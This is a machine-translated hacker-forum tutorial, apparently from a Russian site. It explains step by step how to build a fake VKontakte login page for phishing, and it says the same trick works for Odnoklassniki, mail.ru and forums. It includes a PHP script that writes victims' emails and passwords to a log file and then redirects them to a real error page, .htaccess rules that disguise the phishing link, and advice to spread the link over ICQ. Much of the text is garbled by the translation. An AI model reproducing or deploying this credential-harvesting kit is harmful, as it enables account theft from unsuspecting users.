This page has been robot translated, sorry for typos if any. Original content here.

Fake in a hurry

[iNtrO]

To do it was nothing, it was in the evening .... Actually, on my first article (the first one on anti-chat), I was pulled by the fact that in the section buy / sell / exchange / throw on a large there is a topic in which one hekker prodoval feyki already on 10 vmz, and often asked to create this or that fake ...
I'll tell you one article how you can fiddle with a universal fake almost everything that is hijacked! I will show on the example of fake vkontakte.

[SeaRchINg]

And so, 1 what we need is to select the resource and collect all the information we need, but we only need a copy of some pages. We go to vkontakte.ru through Operu (!) . We press the button, we enter the login.pxp, we take it for the index of our fake. We press in the opera: Fail -> Save as -> In the opened dialog under the name choose (by default there is the Web Archive ....) " HTML Fail with images ", and the graph is required File name write index (or login.htm - depending on the page)


Further we enter there unreal data and we get to the page on which it is written
This e-mail address is not registered or the password is incorrect.
We save it in the same way, only instead of index we write bad .
Next, we drive in Google.ru the phrase Vkontakte.ru, click Additional results with vkontakte.ru » and search for something related to the contact's eroy ... On the second page, I found VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- remember, we need this link
Usa, all we need for feyka from the resource, we already have.

[CoDiNg]

Tax, now we will use the login form. Open our index.html and look for the login form.
 <form method = "post" name = "login" id = "login" action = "login.php">

  <input type = "hidden" name = "success_url" id = "success_url" value = "">
  <input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "gray"> Email: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "gray"> Password: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "margin-top: 1px; vertical-align: middle;"  type = "checkbox" name = "expire" id = "expire" value = "1" /> <small> Alien computer </ small>

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
From here we memorize 3 things:
<form method = "post" name = "login" id = "login" action = "login.php">
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = " pass " value = "" id = "pass" size = "25" />
It is in these 3 things that the first part of the uniqueness lies, on any social network or emily, or elsewhere, everywhere the form of the input (field) will be in this kind (well, only the names of the fields awaken), for example in classmates
<input id = "field_password" value = "" style = "width: 170px;" type = "password" size = "20" name = " st.password ">
Ie just distinguish the name of the fields, design elements, but the function is the same for all.
Now we create a php file, and we call it login.php , its contents:

PHP Code:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
flock ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'password' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'password' ]. " \ n " );
header ( "Location: http: //" );
} else {
header ( "Location: http: //" );
}
flock ( $ f , 3 );
fclose ( $ f );
?>
Actually look at the script, a couple of strings, but this is quite normal fake, its functionality:
Saving the transferred variables, checking them, redirecting depending on the verification.

And so, now we return to those 3 lines:
<form method = "post" name = "login" id = "login" action = " login.php ">
here we have everything in order, the name of our script matches the name of theirs, it does not coincide, then we replace it or we rename it.
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
From here we need name = " email " and name = " pass "
We paste them into our script in the right place
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
flock ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ n " );
header ( "Location: http: //" );
} else {
header ( "Location: http: //" );
}
flock ( $ f , 3 );
fclose ( $ f );
?>
Who did not notice, it's $ _POST ['email'] and $ _POST ['pass']

Next, look at the script, then the IF ELSE function appears, and if it's an e-mail field that matches the email (nickname@mylo.ru, and not how the message is sent), and the password field is not empty, the first redirection is executed, but if the enamel does not match or the pass field is empty, then the second is the redirect. From this it follows that if the Chell entered a soap and something similar to a pass, then we throw it on the page with the erotic http://vkontakte.ru/blank.php?code=10 , and if you entered garbage (here we needed it copy of the page bad.html? when we entered the wrong data), then throw it back, Ie enter bad.htm.

PHP Code:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
flock ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ n " );
header ( "Location: http://vkontakte.ru/blank.php?code=10" );
} else {
header ( "Location: bad.htm" );
}
flock ( $ f , 3 );
fclose ( $ f );
?>
We save all the crap to the server (login.php, index.htm + folder with files, bad.htm + folder with files), create log.txt file (I advise my unique name to come up. Do not forget to change in the script), put on him chmod777.

3) a small update ...

This update is very suitable for SI, in the root of ftp we create a .htaccess file with the following content:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -F
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ATTENTION!!!
! index \ .htm- this redirect is referenced, if you have a fake login.html. then accordingly you need to rename the index in the login.

Tax, this file gives us a link more qualitatively gasily, namely:
yours / any text, if you know the link structure of the fake, for example, contact, we can do this:


yourfake.ro/ photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
and vparit it on ICQ))) agree. less visible now fake))

That's all

[THe eND] Actually that is unique, but the fact that you can go on to classmates, also save the page, enter variables, replace URLs (here I immediately give http://odnoklassniki.ru/dk?st.cmd=error) and everything, absolutely the same way go on mayile.ru, save variables and replace and all))) The only thing you might need is creativity, we'll save not the main page, but the login page. You can also do any forum if you want to get an acc ( send to PM
<a href="file"> link to a topic </a>
, and in the fake you specify this topic for the redirect.